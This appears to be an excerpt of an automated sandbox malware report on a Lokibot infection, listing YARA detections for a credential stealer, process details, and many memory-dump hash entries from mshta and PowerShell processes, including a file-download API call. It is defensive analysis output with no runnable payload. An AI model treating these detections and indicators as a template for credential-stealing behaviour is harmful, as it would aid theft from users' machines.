                                                                                                                Start date:15/11/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                                Imagebase:0xe80000
                                                                                                                File size:56'368 bytes
                                                                                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Loki_1, Description: Loki Payload, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000D.00000002.2893956116.0000000001528000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:false

                                                                                                                Reset < >
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1685664432.0000000006C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_6c90000_mshta.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                  • Instruction ID: 9dc8c3b6b0ff07fd5ebb8d404ffdb82bdb123484cd852734bb300091acce2b34
                                                                                                                  • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1685664432.0000000006C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_6c90000_mshta.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                  • Instruction ID: 9dc8c3b6b0ff07fd5ebb8d404ffdb82bdb123484cd852734bb300091acce2b34
                                                                                                                  • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1685664432.0000000006C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_6c90000_mshta.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                  • Instruction ID: 9dc8c3b6b0ff07fd5ebb8d404ffdb82bdb123484cd852734bb300091acce2b34
                                                                                                                  • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1685664432.0000000006C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_6c90000_mshta.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                  • Instruction ID: 9dc8c3b6b0ff07fd5ebb8d404ffdb82bdb123484cd852734bb300091acce2b34
                                                                                                                  • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.1821334463.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_3170000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 458a0ca0453ee7ca5ddcec02ec3915a4d94e1442cfd8c64fa017199647901d88
                                                                                                                  • Instruction ID: 36e9c1d69bcc5427723e391b66071752c2ae1384f8f23e39b8bb113d49f99b45
                                                                                                                  • Opcode Fuzzy Hash: 458a0ca0453ee7ca5ddcec02ec3915a4d94e1442cfd8c64fa017199647901d88
                                                                                                                  • Instruction Fuzzy Hash: AD221975A002199FCB05CF99D984A9EFBB2FF8C310F298559E814AB365C735ED81CB90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.1835287973.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_7a00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q$tP^q
                                                                                                                  • API String ID: 0-309238000
                                                                                                                  • Opcode ID: 523758c20c1fc6bd1f23da18a411baaac567d1b568ec8d15b83b7ca9672ef722
                                                                                                                  • Instruction ID: c897febaf9b0fee4473b1608031979bc488b76829665a1db2b0b7be44029ff92
                                                                                                                  • Opcode Fuzzy Hash: 523758c20c1fc6bd1f23da18a411baaac567d1b568ec8d15b83b7ca9672ef722
                                                                                                                  • Instruction Fuzzy Hash: 8DF10A74B003099FCB149F68E844AAEBBF6BFC8710F148869E9259F394DA32DC4587D1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.1835287973.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_7a00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q$tP^q
                                                                                                                  • API String ID: 0-309238000
                                                                                                                  • Opcode ID: 3c113410e41fa04b518891833a2f75e1e5c584d31500618df415d8d63dbe5908
                                                                                                                  • Instruction ID: 57d1b888a08f59b4778769be2e089e0a7caad11c52bae0a66660739946d855e5
                                                                                                                  • Opcode Fuzzy Hash: 3c113410e41fa04b518891833a2f75e1e5c584d31500618df415d8d63dbe5908
                                                                                                                  • Instruction Fuzzy Hash: 405147B5B003149FD7209B68A810B2BBBE6ABC5710F14C85AE558DF3D1DA72EC45C3E2
                                                                                                                  APIs
                                                                                                                  • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 031751C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.1821334463.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_3170000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DownloadFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1407266417-0
                                                                                                                  • Opcode ID: 9fed059d4e4ef673866097f3e0a5fffc851e92aa38f25e021686de25bc0188a9
                                                                                                                  • Instruction ID: 46b20b4b04dfab83b119c218666f005e3c4655eda71eaf3c04f9dc64af69ce7d
                                                                                                                  • Opcode Fuzzy Hash: 9fed059d4e4ef673866097f3e0a5fffc851e92aa38f25e021686de25bc0188a9
                                                                                                                  • Instruction Fuzzy Hash: 5C2115B1D01219EFCB00CF9AD984ADEFBF5FB48310F14812AE918A7210D374AA50CFA4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.1835287973.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_7a00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tP^q
                                                                                                                  • API String ID: 0-2862610199
                                                                                                                  • Opcode ID: adf4305e2e086fca52a1d7532043bb045cb7aa348108bd421fe8f9965192573e
                                                                                                                  • Instruction ID: be4a8fb67c90b471d086da04149d257b9ccf70d8cc98f14c120dbac73530fffa
                                                                                                                  • Opcode Fuzzy Hash: adf4305e2e086fca52a1d7532043bb045cb7aa348108bd421fe8f9965192573e
                                                                                                                  • Instruction Fuzzy Hash: 399190B4A00209DFDB18CF58E545AADB7F2BBC8710F248869E8259F394DB71EC458BD1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.1820959787.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_310d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dc694fe04b9fd49af583cc1f21ab6325ed1b8250099f2be46d93cc3c7d8df7cf
                                                                                                                  • Instruction ID: 470f43f529fb692674130a8d8a00d33e38b8004fd6354b8a0c5689f6d1f45610
                                                                                                                  • Opcode Fuzzy Hash: dc694fe04b9fd49af583cc1f21ab6325ed1b8250099f2be46d93cc3c7d8df7cf
                                                                                                                  • Instruction Fuzzy Hash: 8C01F7714093009BE710CA65DA84767FF9CEF49324F1CC469EC4C4B1CAC7B99881C6B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.1820959787.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_310d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c758e8aef26049356089cd965087686f493ae5f3bd05a18690b7e245daa3902e
                                                                                                                  • Instruction ID: b84ade1cfd57d4ba6ad11e255ad8f542e34140234e1edc6f89739ccc14b8a74f
                                                                                                                  • Opcode Fuzzy Hash: c758e8aef26049356089cd965087686f493ae5f3bd05a18690b7e245daa3902e
                                                                                                                  • Instruction Fuzzy Hash: 62012D7140E3C09FD7128B259994B52BFB4EF47224F1D80CBD8888F1A7C2699848C772
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.1835287973.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_7a00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$X=gl$$^q$$^q
                                                                                                                  • API String ID: 0-3800830458
                                                                                                                  • Opcode ID: dde8c0aae8f9ab0148e7c4fd1a615c7d73cea14c7ed884a506dbe0f3db057030
                                                                                                                  • Instruction ID: fc4e16384d43435739fcf9a6da6f578bae7c786a46bd0ff94588845287708091
                                                                                                                  • Opcode Fuzzy Hash: dde8c0aae8f9ab0148e7c4fd1a615c7d73cea14c7ed884a506dbe0f3db057030
                                                                                                                  • Instruction Fuzzy Hash: 8351E3B1A0520A8FCB259B28E4147ABBBF1AFC6310F148C6BD465CB2D5DB31D885C7E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.1835287973.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_7a00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2049395529
                                                                                                                  • Opcode ID: 23d44e6110a9eaac67ecd41947fa474091431dc3f9ceb2a0248f8722c91d7b1c
                                                                                                                  • Instruction ID: dbea24aa3ff4e263bfc5eb152442c7ef8fd3f241c08ae93802489167d279fef4
                                                                                                                  • Opcode Fuzzy Hash: 23d44e6110a9eaac67ecd41947fa474091431dc3f9ceb2a0248f8722c91d7b1c
                                                                                                                  • Instruction Fuzzy Hash: 5401B131A493854FC32B062828202566FB56FC3A1032A49DBC091DF2EBCD658D4A83E2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7830000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                  • API String ID: 0-1420252700
                                                                                                                  • Opcode ID: b85d206a4385dde5884eb7d1a173ea35caee5c711813092ca4d05d2dc161a342
                                                                                                                  • Instruction ID: dcca91c52ceb93bbfa347dd7c7c4e7e16ec9a4adad0fd45a52982e40e14a181b
                                                                                                                  • Opcode Fuzzy Hash: b85d206a4385dde5884eb7d1a173ea35caee5c711813092ca4d05d2dc161a342
                                                                                                                  • Instruction Fuzzy Hash: 441236B1B043198FC7159B6C981476ABBE2AFE6B11F14C0AAD505CF291DB32C985C7E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1711809489.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_4890000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "n^
                                                                                                                  • API String ID: 0-3005575494
                                                                                                                  • Opcode ID: 165a3f5c4bd6ec209948eb620713facd1ca4befc1fbee53a0cedb99b3a280bc5
                                                                                                                  • Instruction ID: 5e6630edfc4f1c35a0e347fd9b9df71507d9b0ca5ad78c161f37516ef0b2cb75
                                                                                                                  • Opcode Fuzzy Hash: 165a3f5c4bd6ec209948eb620713facd1ca4befc1fbee53a0cedb99b3a280bc5
                                                                                                                  • Instruction Fuzzy Hash: 4B51907090E7E19FD703DB28D86159A7FB0AF47214B0A41DBD484CF2A3D628AC49C7A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1711809489.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_4890000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fb7cfc6d3f0d68fef5f6110e579596b9a98b1afe152473cc789a527c4aa3ec1f
                                                                                                                  • Instruction ID: e4bcd777071c4462577b91273a471d6168c81b13262f02feb7033f3e3b57929b
                                                                                                                  • Opcode Fuzzy Hash: fb7cfc6d3f0d68fef5f6110e579596b9a98b1afe152473cc789a527c4aa3ec1f
                                                                                                                  • Instruction Fuzzy Hash: DF917A75A006459FCB15CF58C4989AAFBF1FF48310B288A99D815EB365C735FC91CBA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7830000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: eb549a68cf6996998109b8bf30055672a9993ea327f2ad525eb75cd8ca5497d2
                                                                                                                  • Instruction ID: 9fe7234e585d4cbbf12ca97c421b974ae24c44746d0aa36dd615a26e271799e3
                                                                                                                  • Opcode Fuzzy Hash: eb549a68cf6996998109b8bf30055672a9993ea327f2ad525eb75cd8ca5497d2
                                                                                                                  • Instruction Fuzzy Hash: B341F7F0E006099FCB258F1D8449B797BF1BFA6A15F4480A9C808DF252D731C986C7E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1711809489.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_4890000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c3f437531f9d00c9bbb27ec53b46dd8a5d4892f7b92edb68415e9130c2a5ee54
                                                                                                                  • Instruction ID: e6409cdb41502aa08e81b63ab27cd85f9832a0fab7c8ca58dcd2958b6912b878
                                                                                                                  • Opcode Fuzzy Hash: c3f437531f9d00c9bbb27ec53b46dd8a5d4892f7b92edb68415e9130c2a5ee54
                                                                                                                  • Instruction Fuzzy Hash: 344127B5A00505DFCB09CF58C598AAAFBF1FF48314B258A99D815AB364C736FC51CBA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1711809489.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_4890000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 55787e19526b0aa91c3a2d5ff4e8c3c11d956a088f0b25aed9b10ccb5fe6f861
                                                                                                                  • Instruction ID: 95d8859b76977c616ee1b1ab85d5a14327dc19edcb69dd910df3ac9516c543dc
                                                                                                                  • Opcode Fuzzy Hash: 55787e19526b0aa91c3a2d5ff4e8c3c11d956a088f0b25aed9b10ccb5fe6f861
                                                                                                                  • Instruction Fuzzy Hash: 601107B4A006099FCB04CF98D5909AEBBF1FF89314B148599E809EB361D331FD41CBA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1711533650.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_307d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6742b01f0a5d9afd87a7029c4cc70bd408eef45fed61ba4ffa7eee6386b98364
                                                                                                                  • Instruction ID: 8426caafd7fd74616df62bf3465b45a02b12729bf1ca15560cababead2aa1642
                                                                                                                  • Opcode Fuzzy Hash: 6742b01f0a5d9afd87a7029c4cc70bd408eef45fed61ba4ffa7eee6386b98364
                                                                                                                  • Instruction Fuzzy Hash: 3B012D6140E3C09FD7128B258894B52BFB4EF53224F1D85DBD8888F1A3C2699845C7B2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1711533650.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_307d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e58549bc78be6927f552e756f99a902c855c63eb5c86c4d54acd68e40ab7619f
                                                                                                                  • Instruction ID: 66bf6cc2c66ffa7ef732b80ca4ca936b71099d7bcdce55e24bceeff104343f31
                                                                                                                  • Opcode Fuzzy Hash: e58549bc78be6927f552e756f99a902c855c63eb5c86c4d54acd68e40ab7619f
                                                                                                                  • Instruction Fuzzy Hash: 0401A27180A3409EEB50CA29C984B6BFFD8EF41324F1CC96AED484A246C679D841CAF5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7830000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-1608119003
                                                                                                                  • Opcode ID: 192444af776caa5fb360c1ef5ff3749cd5f70c52fa689ce42f3cf4ed2e50b99a
                                                                                                                  • Instruction ID: e3afcd758c3406d1be99559f1c335b6c518019d0d290549eaeb3f8b11909f35b
                                                                                                                  • Opcode Fuzzy Hash: 192444af776caa5fb360c1ef5ff3749cd5f70c52fa689ce42f3cf4ed2e50b99a
                                                                                                                  • Instruction Fuzzy Hash: A1F115B1F006098FDB149F6C98086AABBE6AFE5B11F18806AD405CB251EB35CD85C7E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7830000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-1608119003
                                                                                                                  • Opcode ID: 1e70bc941c4a2a536ba64ec9bb41970ebda493f975881ee3e6f81fcd4b5582af
                                                                                                                  • Instruction ID: 75be249f65e3d7f3b80952a0027da6698fd5f27791de5979bb739723e3a3fb66
                                                                                                                  • Opcode Fuzzy Hash: 1e70bc941c4a2a536ba64ec9bb41970ebda493f975881ee3e6f81fcd4b5582af
                                                                                                                  • Instruction Fuzzy Hash: 09A167B1B0431A8FC7248F7D980067ABBE6AFE5611F1884ABD445CB395DB32D845CBE1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7830000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-2125118731
                                                                                                                  • Opcode ID: 6d4f22bb316756cb72aeb49cab46eb04428752359a6bafc13547f4153d8f9930
                                                                                                                  • Instruction ID: 524e9fca203a924dda8d9b9983a44e44cfa44eb3476a44e7ff054ebfd7929783
                                                                                                                  • Opcode Fuzzy Hash: 6d4f22bb316756cb72aeb49cab46eb04428752359a6bafc13547f4153d8f9930
                                                                                                                  • Instruction Fuzzy Hash: B62168B171430A5BDB28596E9C01F2BBBDAABE1B16F24C42AE505CF785CD36C84583E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_7830000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2049395529
                                                                                                                  • Opcode ID: 4a620752d292baf5f498b6c3221a9cf77fd31b43b85211bceaaeab563663ae29
                                                                                                                  • Instruction ID: 6e2ae06e10023a69a971d3be33ac0b734adfb80f9665887803d93a020aba7138
                                                                                                                  • Opcode Fuzzy Hash: 4a620752d292baf5f498b6c3221a9cf77fd31b43b85211bceaaeab563663ae29
                                                                                                                  • Instruction Fuzzy Hash: 6101A265B0939A4FC72B162C28246956FF66FD3A10B1A45DBD041CF25BCD194C8E87E3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2334520231.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_b6d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4f27b66b3f7f2cd5eb5b3f701308276fe4737d675d171ef204536c3986c7b325
                                                                                                                  • Instruction ID: 072a7c1d80ddb4122a102ff1ef75b7dfa0b6feb6508e2e3b85d1fd65ca160ec4
                                                                                                                  • Opcode Fuzzy Hash: 4f27b66b3f7f2cd5eb5b3f701308276fe4737d675d171ef204536c3986c7b325
                                                                                                                  • Instruction Fuzzy Hash: 65014C6250D3C09FD7124B258C94752BFB8EF53624F1984DBE9888F1A7C2695C49C772
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2334520231.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_b6d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 583c33bf3a131c4855546da40cc2187849445f772b863c8ea2bfcb8ca42822d3
                                                                                                                  • Instruction ID: dc862ba0fc9a732807c6df055f1266fbca0baf1bc06add46e102ad3d446692e9
                                                                                                                  • Opcode Fuzzy Hash: 583c33bf3a131c4855546da40cc2187849445f772b863c8ea2bfcb8ca42822d3
                                                                                                                  • Instruction Fuzzy Hash: 76012631A083409AE7208A29CDC4B67BFD8EF81364F18C4AAED080B246C27DDC45C6B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2335460626.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_be0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9496b7bd7d63d8a2e1eea92c6a384ae00c069dce7ea93ad6ff75ab4ec323753e
                                                                                                                  • Instruction ID: 1f74898783b6c89ef8970728b17414c461e48d169369d39bceff01ec574ac715
                                                                                                                  • Opcode Fuzzy Hash: 9496b7bd7d63d8a2e1eea92c6a384ae00c069dce7ea93ad6ff75ab4ec323753e
                                                                                                                  • Instruction Fuzzy Hash: 5BF0D435A001099FCB15CF9DD994AEEF7B1FF88324F2081A9E515A72A1C736AD52CB60

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:5.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:68
                                                                                                                  Total number of Limit Nodes:5
